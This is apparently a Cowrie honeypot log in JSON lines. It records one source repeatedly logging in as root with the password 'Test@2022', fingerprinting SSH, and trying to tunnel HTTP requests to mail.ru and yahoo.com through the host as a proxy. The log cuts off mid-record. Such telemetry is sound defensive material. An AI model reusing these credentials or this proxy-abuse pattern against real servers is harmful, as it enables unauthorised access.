{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.218029Z","src_ip":"77.83.207.83","session":"29fa5df6934a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34285,"dst_ip":"1.2.3.4","dst_port":23,"session":"dd01621cd0e1","protocol":"telnet","message":"New connection: 212.227.235.229:34285 (1.2.3.4:23) [session: dd01621cd0e1]","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.314301Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14315,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14315","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.360930Z","session":"29fa5df6934a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.411520Z","src_ip":"77.83.207.83","session":"29fa5df6934a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":26152,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:26152","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.552929Z","session":"29fa5df6934a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.603497Z","src_ip":"77.83.207.83","session":"29fa5df6934a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.654876Z","src_ip":"77.83.207.83","session":"29fa5df6934a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37697,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4070bb0e727","protocol":"ssh","message":"New connection: 77.83.207.83:37697 (1.2.3.4:22) [session: a4070bb0e727]","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.703354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.704027Z","src_ip":"77.83.207.83","session":"a4070bb0e727"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:58.753981Z","src_ip":"77.83.207.83","session":"a4070bb0e727"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.002495Z","src_ip":"77.83.207.83","session":"a4070bb0e727"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":30562,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:30562","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.053920Z","session":"a4070bb0e727"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.103999Z","src_ip":"77.83.207.83","session":"a4070bb0e727"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10422,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10422","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.243998Z","session":"a4070bb0e727"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.294354Z","src_ip":"77.83.207.83","session":"a4070bb0e727"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":11663,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:11663","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.436191Z","session":"a4070bb0e727"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.486298Z","src_ip":"77.83.207.83","session":"a4070bb0e727"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.537427Z","src_ip":"77.83.207.83","session":"a4070bb0e727"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37813,"dst_ip":"1.2.3.4","dst_port":22,"session":"86442fc802e0","protocol":"ssh","message":"New connection: 77.83.207.83:37813 (1.2.3.4:22) [session: 86442fc802e0]","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.586300Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.587466Z","src_ip":"77.83.207.83","session":"86442fc802e0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.637531Z","src_ip":"77.83.207.83","session":"86442fc802e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.886864Z","src_ip":"77.83.207.83","session":"86442fc802e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":28107,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:28107","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.937546Z","session":"86442fc802e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:59.987268Z","src_ip":"77.83.207.83","session":"86442fc802e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":4589,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4589","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.128134Z","session":"86442fc802e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.177991Z","src_ip":"77.83.207.83","session":"86442fc802e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":13804,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:13804","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.320347Z","session":"86442fc802e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.370434Z","src_ip":"77.83.207.83","session":"86442fc802e0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.421071Z","src_ip":"77.83.207.83","session":"86442fc802e0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37934,"dst_ip":"1.2.3.4","dst_port":22,"session":"17dca39f72c0","protocol":"ssh","message":"New connection: 77.83.207.83:37934 (1.2.3.4:22) [session: 17dca39f72c0]","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.470804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.471698Z","src_ip":"77.83.207.83","session":"17dca39f72c0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.521799Z","src_ip":"77.83.207.83","session":"17dca39f72c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.771923Z","src_ip":"77.83.207.83","session":"17dca39f72c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":8028,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:8028","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.823075Z","session":"17dca39f72c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:00.873309Z","src_ip":"77.83.207.83","session":"17dca39f72c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":31236,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:31236","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.016572Z","session":"17dca39f72c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.066869Z","src_ip":"77.83.207.83","session":"17dca39f72c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":30251,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:30251","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.208552Z","session":"17dca39f72c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.258804Z","src_ip":"77.83.207.83","session":"17dca39f72c0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.309764Z","src_ip":"77.83.207.83","session":"17dca39f72c0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38032,"dst_ip":"1.2.3.4","dst_port":22,"session":"651b52701979","protocol":"ssh","message":"New connection: 77.83.207.83:38032 (1.2.3.4:22) [session: 651b52701979]","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.358946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.368851Z","src_ip":"77.83.207.83","session":"651b52701979"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.409534Z","src_ip":"77.83.207.83","session":"651b52701979"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.661627Z","src_ip":"77.83.207.83","session":"651b52701979"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15889,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15889","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.712872Z","session":"651b52701979"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.763493Z","src_ip":"77.83.207.83","session":"651b52701979"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":9334,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:9334","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.904916Z","session":"651b52701979"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:01.955449Z","src_ip":"77.83.207.83","session":"651b52701979"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":15390,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:15390","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.096650Z","session":"651b52701979"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.146995Z","src_ip":"77.83.207.83","session":"651b52701979"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.198310Z","src_ip":"77.83.207.83","session":"651b52701979"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38154,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f0aa9e12994","protocol":"ssh","message":"New connection: 77.83.207.83:38154 (1.2.3.4:22) [session: 3f0aa9e12994]","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.251160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:53:02.251852Z","src_ip":"77.83.207.83","session":"3f0aa9e12994"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes25